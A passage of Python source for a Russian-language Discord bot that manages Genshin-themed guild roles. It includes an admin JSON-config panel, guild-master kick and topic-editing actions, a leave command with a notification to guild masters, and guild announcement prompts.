{type}: Edit: Success;',\n\t\t\t\t\t\t color=discord.Colour.from_rgb(80, 141, 234))))\n\t\t\t\t\tawait asyncio.sleep(1.5)\n\t\t\t\t\tawait last_page(type, ctx, msg)\n\n\nasync def delete_json_to_type(type, ctx, msg):\n\tdef check(msg):\n\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\tembed_give_me_a_tag_to_delete = discord.Embed(\n\t\ttitle=f\"Адмни-Панель: JSON: {type}: Delete: Tag;\",\n\t\tdescription=\"Отправьте в чат тег который надо удалить.\",\n\t\tcolor=discord.Colour.from_rgb(80, 141, 234)\n\t)\n\tembed_give_me_a_tag_to_delete = models.embed_stan(embed_give_me_a_tag_to_delete)\n\n\tembed_none_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\",\n\t description=\"Такого значения нет в базе данных, возвращаю вас на прежнюю страницу.\"))\n\n\tembed_time_err = models.embed_stan(embed=discord.Embed(title=f\"Админ-Панель: JSON: {type}: Edit: Error;\",\n\t description=\"Вы не дали ответ, возвращаю вас на прежнюю страницу.\"))\n\n\tawait msg.edit(embed=embed_give_me_a_tag_to_delete, view=models.NonBts())\n\ttry:\n\t\ttagN = await bot.wait_for(\"message\", check=check, timeout=30)\n\texcept TimeoutError:\n\t\tawait msg.edit(embed=embed_time_err, view=models.NonBts())\n\t\tawait asyncio.sleep(2.5)\n\t\tawait last_page(type, ctx, msg)\n\telse:\n\t\tche = models.check_tag_in_type(type, tagN.content)\n\t\tif che is None:\n\t\t\tawait msg.edit(embed=embed_none_err, view=models.NonBts())\n\t\t\tawait asyncio.sleep(2.5)\n\t\t\tawait last_page(type, ctx, msg)\n\t\telse:\n\t\t\tif che is True:\n\t\t\t\tmodels.delete_tag_in_type(type, tagN.content)\n\t\t\t\tawait msg.edit(embed=models.embed_stan(\n\t\t\t\t\tembed=discord.Embed(title=f'Админ-Панель: JSON: {type}: Edit: Success;',\n\t\t\t\t\t color=discord.Colour.from_rgb(80, 141, 234))), view=models.NonBts())\n\t\t\t\tawait asyncio.sleep(1.5)\n\t\t\t\tawait last_page(type, ctx, msg)\n\n\nasync def json_type_pan(ctx, msg, type: str):\n\tedit = models.EditJson(au=await ctx.guild.fetch_member(ctx.author.id))\n\tembed_type = discord.Embed(title=f'Админ-Панель: JSON: {type};', description=f\"Что надо сделать со всеми {type.lower()}?\", color=discord.Color.from_rgb(80, 141, 234))\n\tembed_type = models.config_roles_file_get_by_type(type, embed_type)\n\n\tawait msg.edit(embed=embed_type, view=edit)\n\n\tawait edit.wait()\n\n\tif edit.value is None:\n\t\tawait msg.delete()\n\n\telif edit.value == \"EDIT\":\n\t\tawait edit_json_type(ctx, msg, type)\n\n\telif edit.value == \"ADD\":\n\t\tawait add_json_to_type(ctx, msg, type)\n\n\telif edit.value == \"DELETE\":\n\t\tawait delete_json_to_type(type, ctx, msg)\n\n\telif edit.value == \"BACK\":\n\t\tawait json_pan(ctx, msg)\n\n\telif edit.value == \"STOP\":\n\t\tawait msg.delete()\n\n\telse:\n\t\tpass\n\n\n# -----------------------------------------------------------------------------\n\n# Админ-Команды\n\n@bot.command(name=\"ap\")\n@com.max_concurrency(number=1, per=com.BucketType.user, wait=False)\nasync def admin_panel(ctx):\n\tawait main(ctx)\n\n\n# -----------------------------------------------------------------------------\n\n# Юзер-Команды\n\n# User-Profile\n\nasync def get_guild(ctx, need: int):\n\tuser = ctx.author\n\n\tasync def all_guilds():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tobj = []\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tfor gui in gs:\n\t\t\tr = models.get_tag_value(\"ROLE\", f\"role_{gui}\")\n\t\t\tr = guild.get_role(r)\n\n\t\t\tobj.append(r.id)\n\n\t\treturn obj\n\n\tasync def all_Gmasters():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tobj = []\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tfor gui in gs:\n\t\t\tr = models.get_tag_value(\"TIME_ROLE\", f\"guild-master_{gui.lower()}\")\n\t\t\tr = guild.get_role(r)\n\t\t\tobj.append(r.id)\n\n\t\treturn obj\n\n\tasync def all_Gvisions():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tobj = []\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tfor gui in gs:\n\t\t\twith open(\"additional_files/config_file.json\", \"r\") as file:\n\t\t\t\tfile = json.load(file)\n\n\t\t\ttim = file[\"TIME_ROLE\"]\n\n\t\t\tfor key in tim:\n\t\t\t\tif key.startswith(\"guild-vision\"):\n\t\t\t\t\tobj.append(tim[key])\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\treturn obj\n\n\trol = await all_guilds()\n\n\tgms = await all_Gmasters()\n\n\tgvs = await all_Gvisions()\n\n\tlvl = await access_lvl(ctx=ctx)\n\n\tlist = []\n\n\tif lvl != need:\n\t\treturn \"Error loading profile\"\n\telse:\n\t\tif lvl and need == 0:\n\t\t\tfor role in user.roles:\n\t\t\t\tfor r in rol:\n\t\t\t\t\tif role.id == r:\n\t\t\t\t\t\tlist.append(role)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif len(list) == 0 or len(list) > 1:\n\t\t\t\treturn \"Error more than two user roles!\"\n\t\t\telse:\n\t\t\t\tif len(list) == 1:\n\t\t\t\t\treturn list[0]\n\n\t\telif lvl and need == 1:\n\t\t\tfor role in user.roles:\n\t\t\t\tfor r in gms:\n\t\t\t\t\tif role.id == r:\n\t\t\t\t\t\tlist.append(role)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif len(list) == 0 or len(list) > 1:\n\t\t\t\treturn \"Error more than two guild-master roles!\"\n\t\t\telse:\n\t\t\t\tif len(list) == 1:\n\t\t\t\t\treturn list[0]\n\n\t\telif lvl and need == 2:\n\t\t\tfor role in user.roles:\n\t\t\t\tfor r in gvs:\n\t\t\t\t\tif role.id == r:\n\t\t\t\t\t\tlist.append(role)\n\t\t\t\t\telse:\n\t\t\t\t\t\tpass\n\n\t\t\tif len(list) == 0 or len(list) > 1:\n\t\t\t\treturn \"Error more than two guild-vision roles!\"\n\t\t\telse:\n\t\t\t\tif len(list) == 1:\n\t\t\t\t\treturn list[0]\n\t\telse:\n\t\t\t\"Error in access lvl!\"\n\n\n# Профиль для первого уровня доступа.\nasync def user_profile(ctx=None, msg=None, user=None):\n\tawait nope(ctx=ctx, msg=msg, page_name=\"Профили для всех!\", what_will_be_on_this_page=\"Профили для всех юзеров.\")\n\n\n# Профиль для второго уровня доступа.\n\n\nclass GmasterNotDefined(Exception):\n\n\tdef __init__(self, msg=None):\n\t\tself.msg = msg if msg else \"Гильд мастер не обнаружен, требуется вмешательство в код или стороннее действие со стороны Client.\"\n\n\tdef __str__(self):\n\t\treturn self.msg\n\n\tdef __repr__(self):\n\t\treturn \"Экземпляр класса GmasterNotDefined\"\n\n\nclass GuildMaster:\n\n\tdef __init__(self, ctx):\n\n\t\tself.ctx = ctx\n\t\t#\n\t\tself.user = ctx.author\n\t\tself.guild: str = self.define_master(self.user) if self.define_master(self.user) is not None else \"Unknown\"\n\n\tdef __str__(self) -> str:\n\t\treturn f\"{self.user} -> {self.guild}-master\"\n\n\tdef __repr__(self):\n\t\tname = self.__class__.__name__\n\t\t# @ToDo master = self.user\n\t\treturn (\n\t\t\tf\"<{name} ctx={self.ctx} master={self.guild} guild={self.guild}>\"\n\t\t)\n\n\t@classmethod\n\tdef define_master(cls, user) -> str:\n\t\tall_guilds: dict = models.NEDOGUILD().get_all_guilds()\n\n\t\tfor guild in all_guilds.keys():\n\t\t\tserver = bot.get_guild(794987714310045727)\n\t\t\t#\n\t\t\t#\n\t\t\trole = all_guilds[guild][\"guild_master_role\"]\n\t\t\t#\n\t\t\trole = server.get_role(role)\n\n\t\t\tif role in user.roles:\n\t\t\t\treturn str(guild.split(\"_\")[1])\n\n\tasync def __get_msg(self, wait: int, wait_for: discord.Embed, message: discord.Message = None) -> discord.Message or None:\n\t\tdef check(message):\n\t\t\treturn message.author == self.user and message.channel == self.ctx.channel\n\n\t\ttry:\n\n\t\t\tdsc = wait_for.description\n\n\t\t\tw = f\"\\n\\n\\n\\n**__Я буду ждать лишь {wait} секунд...__**\"\n\n\t\t\twait_for.description = dsc + w\n\n\t\t\tawait message.edit(embed=wait_for, view=models.NonBts())\n\t\texcept Exception as exc:\n\t\t\tLOGGER.error(f\"Exception in get_msg \\n {exc}\")\n\t\t\traise LookupError() from exc\n\t\ttry:\n\n\t\t\twait_for_msg = await bot.wait_for(\"message\", check=check, timeout=wait)\n\n\t\texcept asyncio.exceptions.TimeoutError:\n\t\t\treturn None\n\t\telse:\n\t\t\treturn wait_for_msg\n\n\tasync def __define_user(self, msg: discord.Message) -> discord.User or discord.Member:\n\n\t\tembed_which_user_to_kick = discord.Embed(title=\"Кого?\", description=\"@упомяни юзера которого надо которым надо произвести некие действа.\", color=standard_color)\n\t\tembed_which_user_to_kick = models.embed_stan(embed_which_user_to_kick)\n\n\t\tuser_: discord.Message = await self.__get_msg(wait=45, wait_for=embed_which_user_to_kick, message=msg)\n\n\t\tif user_ is None:\n\n\t\t\tawait msg.delete()\n\n\t\telse:\n\t\t\tawait user_.delete()\n\t\t\ttry:\n\t\t\t\tuser_id = re.findall(r\"\\d+\", str(user_.content))[0]\n\t\t\t\tif len(str(user_id)) != 18:\n\t\t\t\t\traise UserWarning\n\n\t\t\t\telse:\n\t\t\t\t\tuser: discord.Member = await self.ctx.guild.fetch_member(int(user_id))\n\t\t\texcept Exception as exc:\n\t\t\t\traise UserWarning(exc) from exc\n\t\t\telse:\n\t\t\t\treturn user\n\n\t@classmethod\n\tasync def kick(cls, **kwargs):\n\t\tguild = kwargs.get(\"guild\")\n\t\tctx: com.Context = kwargs.get(\"ctx\")\n\t\tgt = kwargs.get(\"gt\")\n\t\tmsg: discord.Message = kwargs.get(\"msg\")\n\n\t\tuser: discord.Member = await gt.__define_user(msg=msg) if kwargs.get(\"user\", None) is None else kwargs.get(\"user\", None)\n\n\t\tguild_role_id = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = ctx.guild.get_role(guild_role_id)\n\n\t\tawait user.trigger_typing()\n\n\t\tif guild_role in user.roles:\n\t\t\tawait user.remove_roles(guild_role, reason=\"По приказу генерала гафса\")\n\t\t\tresult = f\"{user.mention} исключен из гильдии {guild}.\"\n\t\t\tcol = discord.Color.green()\n\n\t\t\tdefense = GuildDefense(bot=bot, server=ctx.guild, user=user.id, guild=guild)\n\n\t\t\tdefense.set_cooldown(cooldown_seconds=ONE_DAY_IN_SECONDS * 2) # кулдаун на 2 дня\n\n\t\telse:\n\t\t\tresult = f\"{user.mention} не был исключен из гильдии {guild}, так как в ней и не находился.\"\n\t\t\tcol = discord.Color.red()\n\n\t\tembed_success = models.embed_stan(embed=discord.Embed(title=\"Готово\", description=result, color=col))\n\n\t\tawait msg.edit(embed=embed_success)\n\t\tawait ctx.channel.trigger_typing()\n\t\tawait asyncio.sleep(4)\n\t\tawait gt.get_profile(msg)\n\n\tasync def __chdc(self, msg):\n\t\tembed__ = discord.Embed(title=\"На что изменим?\", description=\"Максимально напряги свои мозги и включи воображение, а затем напиши в чат то, что придумал.\", color=standard_color)\n\t\tembed__ = models.embed_stan(embed__)\n\n\t\tnew_topic: discord.Message = await self.__get_msg(wait=45, wait_for=embed__, message=msg)\n\n\t\tif new_topic is None:\n\t\t\tawait msg.delete()\n\t\telse:\n\t\t\tawait new_topic.delete()\n\t\t\ttopic = f\"{new_topic.content}\"\n\n\t\t\ttry:\n\t\t\t\tguild_channel: discord.TextChannel = await self.ctx.guild.fetch_channel(models.NEDOGUILD().get_one_tag(guild=self.guild, tag=\"channel\"))\n\t\t\texcept Exception as exc:\n\t\t\t\tawait something_went_wrong(msg=msg, problem=str(exc))\n\t\t\t\traise discord.Forbidden\n\t\t\telse:\n\t\t\t\tawait guild_channel.edit(reason=\"По приказу генерала гафса!\", topic=topic)\n\n\t\t\tif (str(new_topic.content) == str(models.NEDOGUILD().get_one_tag(guild=self.guild, tag=\"guild_chat_description\"))):\n\t\t\t\tresult = \"Тема канала не была изменена, ведь новая <<{}>> идентична старой.\"\n\t\t\t\tcolor = discord.Color.red()\n\t\t\telse:\n\t\t\t\tresult = \"Тема канала успешно изменена на {}.\"\n\t\t\t\tcolor = discord.Color.green()\n\n\t\t\tembed_success = discord.Embed(title=\"Готово\", description=result.format(topic), color=color)\n\n\t\t\tawait msg.edit(embed=embed_success, view=models.NonBts())\n\n\t\t\tawait self.ctx.channel.trigger_typing()\n\n\t\t\tawait asyncio.sleep(5)\n\n\t\t\tawait self.get_profile(msg)\n\n\tasync def __chte(self, msg):\n\t\tembed__ = discord.Embed(title=\"На что изменим?\", description=\"Максимально напряги свои мозги и включи воображение, а затем напиши в чат то, что придумал.\", color=standard_color)\n\t\tembed__ = models.embed_stan(embed__)\n\n\t\tnew_text: discord.Message = await self.__get_msg(wait=180, wait_for=embed__, message=msg)\n\n\t\tif new_text is None:\n\t\t\tawait msg.delete()\n\t\telse:\n\t\t\tawait new_text.delete()\n\t\t\told_text: str = models.NEDOGUILD().get_one_tag(guild=self.guild, tag=\"campaign_speech\")\n\n\t\t\ttry:\n\t\t\t\tif (str(new_text.content).lower() == old_text.lower()):\n\t\t\t\t\tresult: str = \"**Агитационная речь не была изменена**\\n\" \\\n\t\t\t\t\t \"**Старая речь идентична новой**: \\n\\n\\n {}\".format(new_text.content)\n\t\t\t\t\tcolor: discord.Color = discord.Color.red()\n\t\t\t\t\ttime_wait: int = 5\n\t\t\t\telse:\n\t\t\t\t\tnew_text: str = models.NEDOGUILD().update_one_tag(guild=self.guild, tag=\"campaign_speech\", new_value=new_text.content)\n\t\t\t\t\tresult: str = \"**Агитационная речь была изменена на**: \\n\\n\\n {}\".format(new_text)\n\t\t\t\t\tcolor: discord.Color = discord.Color.green()\n\t\t\t\t\ttime_wait: int = 10\n\n\t\t\t\t#\n\t\t\t\t# END\n\t\t\t\t#\n\t\t\t\tembed_ = discord.Embed(title=\"Готово\", description=result, color=color)\n\t\t\t\tawait msg.edit(embed=embed_, view=models.NonBts())\n\n\t\t\t\tawait self.ctx.trigger_typing()\n\n\t\t\t\tawait asyncio.sleep(time_wait)\n\n\t\t\t\tawait self.get_profile(message=msg)\n\n\t\t\texcept Exception as exc:\n\t\t\t\tawait something_went_wrong(msg=msg, problem=str(exc))\n\n\tasync def get_profile(self, message=None) -> None:\n\t\tif self.guild == \"Unknown\":\n\t\t\traise GmasterNotDefined\n\n\t\tprofile_embed = models.embed_stan(embed=discord.Embed(\n\t\t\ttitle=\"User-Profiles: Gmaster: Profile;\",\n\t\t\tdescription=f\"У меня есть много способов угандошить {self.guild}, какой хочешь применить?\",\n\t\t\tcolor=standard_color))\n\n\t\tbuttons = models.ButtonsForGmasters(au=self.user)\n\n\t\tif message is None:\n\t\t\tprofile_message: discord.Message = await self.ctx.send(embed=profile_embed, view=buttons)\n\t\telse:\n\t\t\tprofile_message: discord.Message = await message.edit(embed=profile_embed, view=buttons)\n\n\t\tawait buttons.wait()\n\t\tbuttons_value = buttons.value\n\n\t\tif buttons_value == \"KICK\":\n\t\t\tawait self.kick(ctx=self.ctx, guild=self.guild, gt=self, msg=profile_message)\n\n\t\telif buttons_value == \"CHDC\":\n\t\t\tawait self.__chdc(message)\n\n\t\telif buttons_value == \"SPRA\":\n\t\t\tawait self.__chte(msg=message)\n\n\t\telse:\n\t\t\ttry:\n\t\t\t\tawait profile_message.delete()\n\t\t\texcept Exception as exc:\n\t\t\t\tLOGGER.error(f\"Deleting message exception {exc} GuildMaster -> get_profile\")\n\n\n# @bot.command()\n# async def chncm(ctx: com.Context):\n# \toverwrites = {\n# \t\tctx.author: discord.PermissionOverwrite(view_channel=True, send_messages=True),\n# \t\tbot.user: discord.PermissionOverwrite(view_channel=True, send_messages=True),\n# \t\tctx.guild.default_role: discord.PermissionOverwrite(view_channel=False, send_messages=False),\n# \t}\n#\n# \tc = await ctx.guild.create_text_channel(\n# \t\tposition=0,\n# \t\tcategory=ctx.channel.category,\n# \t\tname=f\"Ливы\",\n# \t\toverwrites=overwrites,\n# \t\treason=\"По приказу генерала гафса\",\n# \t\ttopic=f\"Канал для юзеров по тихому ушедших из гильдии...\",\n# \t\tslowmode_delay=1\n#\n# \t)\n#\n# \tawait c.send(f\"{ctx.author.mention}\")\n\n@bot.command(\n\tname=\"leave\",\n\taliases=[\n\t\t\"выйти\",\n\t\t\"покинуть\",\n\t\t\"аривидерчи\",\n\t\t\"бай\",\n\t\t\"лив\",\n\t\t\"люблю-гей-дорамы\",\n\n\t\t# transcript\n\t\t\"выйtи\",\n\t\t\"пokинуть\",\n\t\t\"aривидерчи\",\n\t\t\"бaй\",\n\t\t\"лNв\",\n\t\t\"люbлю-гeй-дoрaмы\"\n\t]\n)\nasync def leave(ctx):\n\tdef define_guild(user: nextcord.Member):\n\t\tall_guilds: dict = models.NEDOGUILD().get_all_guilds()\n\n\t\tfor guild in all_guilds.keys():\n\t\t\tserver = bot.get_guild(794987714310045727)\n\t\t\t#\n\t\t\t#\n\t\t\trole = all_guilds[guild][\"role\"]\n\t\t\t#\n\t\t\trole = server.get_role(role)\n\n\t\t\tif role in user.roles:\n\t\t\t\treturn str(guild.split(\"_\")[1])\n\n\t\treturn None\n\n\tguild = define_guild(ctx.author)\n\tctx: com.Context = ctx\n\n\tuser: discord.Member = ctx.author\n\n\tawait user.trigger_typing()\n\n\tif guild is not None:\n\t\tguild_role_id = models.NEDOGUILD().get_one_tag(guild=guild, tag=\"role\")\n\t\tguild_role = ctx.guild.get_role(guild_role_id)\n\t\tawait user.remove_roles(guild_role, reason=\"По приказу генерала гафса\")\n\n\t\tdefense = GuildDefense(bot=bot, server=ctx.guild, user=user.id, guild=guild)\n\n\t\tdefense.set_cooldown(cooldown_seconds=ONE_DAY_IN_SECONDS * 2) # кулдаун на 2 дня\n\n\t\tawait ctx.guild.get_channel(972510360710037564).send(\n\t\t\tcontent=f\"{ctx.guild.get_role(models.NEDOGUILD().get_one_tag(guild=guild, tag='guild_master_role')).mention}\",\n\t\t\tembed=models.embed_stan(\n\t\t\t\tembed=nextcord.Embed(\n\t\t\t\t\ttitle=\"ГМа предали!\",\n\t\t\t\t\tdescription=f\"Этот \\*\\*\\*а\\*\\*\\с -> {user.mention} <- решил уйти по-тихому из {guild}!\",\n\t\t\t\t\tcolor=discord.Color.red()\n\t\t\t\t)\n\t\t\t)\n\t\t)\n\n\t\tresult = f\"{user.mention} исключен из гильдии {guild}.\"\n\t\tcol = discord.Color.green()\n\n\n\n\n\telse:\n\t\tresult = f\"{user.mention} не был исключен из гильдии так как в ней и не находился.\"\n\t\tcol = discord.Color.red()\n\n\tembed_success = models.embed_stan(embed=discord.Embed(title=\"Готово\", description=result, color=col))\n\n\tawait ctx.send(\n\t\tembed=embed_success,\n\t\tdelete_after=60,\n\t)\n\n\n@bot.command()\n@com.has_any_role(929552483808858132)\nasync def update_guild_database_now(ctx):\n\tserver = ctx.guild\n\n\tasync def all_guilds():\n\t\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\tguild = await bot.fetch_guild(794987714310045727)\n\n\t\tobj = {}\n\n\t\tfor gui in gs:\n\t\t\tr = models.get_tag_value(\"ROLE\", f\"role_{gui}\")\n\t\t\tr = guild.get_role(r)\n\t\t\tc = models.get_tag_value(\"CHANNEL\", f\"channel_{gui}\")\n\t\t\tc = await guild.fetch_channel(c)\n\n\t\t\tobj[f\"{gui}\"] = {\n\t\t\t\t\"r\": r,\n\t\t\t\t\"c\": c\n\t\t\t}\n\n\t\treturn obj\n\n\tasync def get_Gmaster(guild) -> dict:\n\n\t\tguild_master_role_id = models.get_tag_value(\"TIME_ROLE\", f\"guild-master_{guild}\")\n\n\t\tguild_master_role = server.get_role(guild_master_role_id)\n\t\ttry:\n\t\t\tguild_master_user = guild_master_role.members[0]\n\t\texcept Exception as e:\n\t\t\tLOGGER.error(f\"ОШИБКА В get_Gmaster в НЕ НАЙДЕН ГМ {guild}, ПОДСТАВЛЕН АВАКУСУ\"\n\t\t\t f\"! \\n\" + str(e))\n\n\t\t\tguild_master_user = server.get_member(361198710551740428)\n\t\treturn {\"role\": guild_master_role, \"user\": guild_master_user}\n\n\talgs = await all_guilds()\n\tgs = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\tg = models.NEDOGUILD()\n\n\tdef get_channel(guild):\n\t\treturn server.get_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild}\"))\n\n\tfor guild in gs:\n\t\tgmstr: dict = await get_Gmaster(guild)\n\t\tchat = get_channel(guild)\n\t\tg.create_guild_settings(agi=\"#\", guild=guild, users=len(algs[guild]['r'].members), role=algs[guild]['r'].id, guild_master=gmstr[\"user\"].id, guild_chat_description=chat.topic, channel=chat.id,\n\t\t guild_master_role=gmstr[\"role\"].id)\n\n\nasync def Gmaster_profile(ctx=None, msg=None) -> None:\n\ttry:\n\t\ttry:\n\t\t\tawait ctx.message.delete()\n\t\texcept discord.Forbidden:\n\t\t\tpass\n\t\texcept discord.NotFound:\n\t\t\tpass\n\t\texcept discord.HTTPException:\n\t\t\tpass\n\n\t\tmaster = GuildMaster(ctx=ctx)\n\t\tif master.guild.lower() == \"Unknown\".lower():\n\t\t\tLOGGER.info(\"G-master non defined\")\n\n\t\tawait master.get_profile(message=msg)\n\n\texcept LookupError or Exception as exc:\n\t\treturn await something_went_wrong(msg, f\"{exc}\")\n\texcept UserWarning as exc:\n\t\treturn await something_went_wrong(msg, f\"Не удалось определить юзера {exc}\")\n\tfinally:\n\t\tLOGGER.debug(\"Called the G-master profile\")\n\n\n# Профиль для третьего уровня доступа.\nasync def Gvision_profile(ctx=None, msg=None, user=None):\n\tuser = ctx.author if user is None else user == user\n\tif await access_lvl(user_=user) == 2:\n\t\t# Эмбед с выбором чё сделать типа\n\t\tembed_c_m_p = discord.Embed(title='User-Profiles: Gvision: Profile;', description=\"Выберите что вам необходимо с помощью кнопок ниже, все режимы представлены ниже.\", color=standard_color)\n\t\tembed_c_m_p = models.embed_stan(embed_c_m_p)\n\n\t\tGvision = models.Gvision(au=await ctx.guild.fetch_member(ctx.author.id))\n\n\t\tawait msg.edit(embed=embed_c_m_p, view=Gvision)\n\n\t\tawait Gvision.wait()\n\n\t\tres = Gvision.value\n\n\t\tif res == \"LOGS\":\n\t\t\tawait logs(ctx, msg)\n\n\t\telif res == \"MSGS\":\n\t\t\tawait msgs(ctx, msg)\n\n\t\telif res == \"STAT\":\n\t\t\tawait stat(ctx, msg)\n\n\t\telif res == \"EDIT\":\n\t\t\tawait mana(ctx, msg)\n\t\telse:\n\t\t\tif res == \"STOP\" or res is None:\n\t\t\t\tawait msg.delete()\n\telse:\n\t\tawait something_went_wrong(msg=msg, problem=\"Ошибка определения уровня доступа.\")\n\n\n# ---------------------------------------------------------------------------\n\n@bot.command()\n@com.max_concurrency(number=1, per=com.BucketType.user, wait=False)\n@com.cooldown(rate=1, per=5, type=com.BucketType.user)\nasync def members(ctx, role: discord.Role):\n\tacc_lvl = await access_lvl(ctx=ctx)\n\tcracks = [10, 20, 30, 40, 50, 60, 70, 80, 90, 100]\n\tcount = 1\n\ttext = \"\\n\"\n\tif acc_lvl >= 1:\n\t\tembed_users = discord.Embed(title=\"#\", description=\"#\", color=standard_color)\n\n\t\tfor member in role.members:\n\t\t\ttext += f\"{count}. {member.mention}({member.id})\\n\"\n\t\t\tif count in cracks:\n\t\t\t\ttext += \"---\"\n\t\t\tcount += 1\n\n\t\ttexts = text.split(\"---\")\n\n\t\tfor t in texts:\n\t\t\tawait ctx.send(t)\n\n\n@members.error\nasync def error(ctx, error):\n\tif isinstance(error, com.MissingRequiredArgument):\n\t\tawait ctx.send(\"Не указана роль, пожалуйста укажите роль!\")\n\telif isinstance(error, com.CommandOnCooldown):\n\t\tawait ctx.send(f\"Команда откатывается, подожди {error.retry_after:.2f}с!\")\n\telse:\n\t\tawait ctx.send(str(error))\n\n\n# Функции для третьего уровня доступа\nasync def logs(ctx, msg):\n\tawait nope(ctx, msg, page_name=\"Логи\", what_will_be_on_this_page=\"Логи\")\n\n\nasync def msgs(ctx, msg):\n\tembed_guild_s_cho = discord.Embed(title='User-Profiles: Gvision: Profile: Msgs;', description=\"Нажмите на одну из кнопок представленных ниже.\", color=standard_color)\n\tembed_guild_s_cho = models.embed_stan(embed_guild_s_cho)\n\n\tmsgs = models.Msgs(au=await ctx.guild.fetch_member(ctx.author.id))\n\n\tawait msg.edit(embed=embed_guild_s_cho, view=msgs)\n\n\tawait msgs.wait()\n\n\tval = msgs.value\n\n\tif val == \"ONEG\":\n\t\tawait msgs_one(ctx, msg)\n\n\telif val == \"ALLG\":\n\t\tawait msgs_many(ctx, msg)\n\n\telif val == \"BACK\":\n\t\tawait return_profile(ctx, msg)\n\n\telif val == \"STOP\" or val is None:\n\t\tawait msg.delete()\n\n\nasync def message(title, desc, ping, pin, guild_obj, ctx):\n\tif ping.lower() in (\"yes\", \"да\", \"конечно\", \"ага\"):\n\t\tping_ = guild_obj['role'].mention\n\telse:\n\t\tping_ = \"\"\n\n\tembed = discord.Embed(title=title, description=f\"Уведомление для всех {guild_obj['role'].mention} от {ctx.author.mention}. **Читайте внимательно**!\\n\\n\\n{desc}\", color=standard_color)\n\n\tembed = models.embed_stan(embed)\n\n\tmsg = await guild_obj['channel'].send(content=ping_, embed=embed)\n\n\tif pin.lower() in (\"yes\", \"да\", \"конечно\", \"ага\"):\n\t\ttry:\n\t\t\tawait msg.pin()\n\t\texcept Exception:\n\t\t\tpass\n\telse:\n\t\tpass\n\n\treturn {\"title\": title,\n\t \"desc\": desc,\n\t \"ping\": ping,\n\t \"pin:\": pin,\n\t \"guild_obj\": guild_obj,\n\n\t }\n\n\nasync def msgs_one(ctx, msg):\n\ttry:\n\t\tasync def give_me_message(ctx, msg, sho: str, time_wait: int):\n\t\t\tdef check(msg):\n\t\t\t\treturn msg.author == ctx.author and msg.channel == ctx.channel\n\n\t\t\tembed_give_me = discord.Embed(title='Система сбора данных \"Ук��аїнський хакер Вiталя\"', description=f\"Напишите в чат {sho}\", color=standard_color)\n\t\t\tembed_give_me = models.embed_stan(embed_give_me)\n\n\t\t\tembed_you_do_not_s = discord.Embed(title='Система сбора данных', description=f\"Вы не написали в чат '{sho}'. \\nПереношу вас на прежнюю страницу.\", color=standard_color)\n\t\t\tembed_you_do_not_s = models.embed_stan(embed_you_do_not_s)\n\n\t\t\tawait msg.edit(embed=embed_give_me, view=models.NonBts())\n\n\t\t\ttry:\n\t\t\t\tvalue = await bot.wait_for(\"message\", check=check, timeout=time_wait)\n\t\t\texcept TimeoutError:\n\t\t\t\tawait msg.edit(embed=embed_you_do_not_s)\n\t\t\t\tawait asyncio.sleep(2.5)\n\t\t\t\tawait msgs(ctx, msg)\n\t\t\telse:\n\t\t\t\tawait value.delete()\n\t\t\t\treturn value.content\n\n\t\tasync def return_guild(guild: str):\n\t\t\tlist_of_guilds = [\"Dendro\", \"Hydro\", \"Pyro\", \"Cryo\", \"Anemo\", \"Electro\", \"Geo\"]\n\n\t\t\tguild_after_for = None\n\n\t\t\tfor gui in list_of_guilds:\n\t\t\t\tif gui.lower() == guild.lower():\n\t\t\t\t\tguild_after_for = gui\n\t\t\t\telse:\n\t\t\t\t\tpass\n\n\t\t\tif guild_after_for is None:\n\t\t\t\tawait something_went_wrong(msg, \"была введена несуществующая гильдия, возможна ошибка внутри скрипта.\")\n\t\t\telse:\n\t\t\t\tguild = await bot.fetch_guild(794987714310045727)\n\t\t\t\tguild_object = {\n\t\t\t\t\t\"role\": guild.get_role(models.get_tag_value(\"ROLE\", f\"role_{guild_after_for}\")),\n\t\t\t\t\t\"channel\": await guild.fetch_channel(models.get_tag_value(\"CHANNEL\", f\"channel_{guild_after_for}\"))\n\n\t\t\t\t}\n\t\t\t\treturn guild_object\n\n\t\tguild_str = await give_me_message(ctx, msg, \"гильдию в которую надо отправить сообщение.\", 20)\n\t\ttitle_str = await give_me_message(ctx, msg, \"заголовок для сообщения.\", 20)\n\t\tmainTXT_str = await give_me_message(ctx, msg, \"основной текст сообщения.\", 300)\n\t\tpin_str = await give_me_message(ctx, msg, \"надо ли закреплять сообщение.\", 20)\n\t\tping_str = await give_me_message(ctx, msg, \"надо ли пинговать всю гильдию.\", 20)\n\n\t\tmessage_returns = await message(ctx=ctx, title=title_str, guild_obj=await return_guild(guild_str), desc=mainTXT_str, pin=pin_str, ping=ping_str)\n\n\t\tawait msgs(ctx, msg)\n\n\texcept BotMissingPermissions as bmp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{bmp}\")\n\texcept MissingPermissions as mp:\n\t\tawait something_went_wrong(msg=msg, problem=f\"У бота отсутстсвуют нужные права для работы!\\n{mp}\")\n\texcept Exception as e:\n\t\tawait something_went_wrong(msg=msg)\n\t\tLOGGER.error(\"-------------------------------------------------------------------------\\n\"\n\t\t f\"Ошибка в функции отправки сообщения в одну гильдию: {e}\\n\"\n\t\t f\"-------------------------------------------------------------------------\")\n\n\nasync def msgs_many(ctx, msg):\n\ttry:\n\t\tasync def 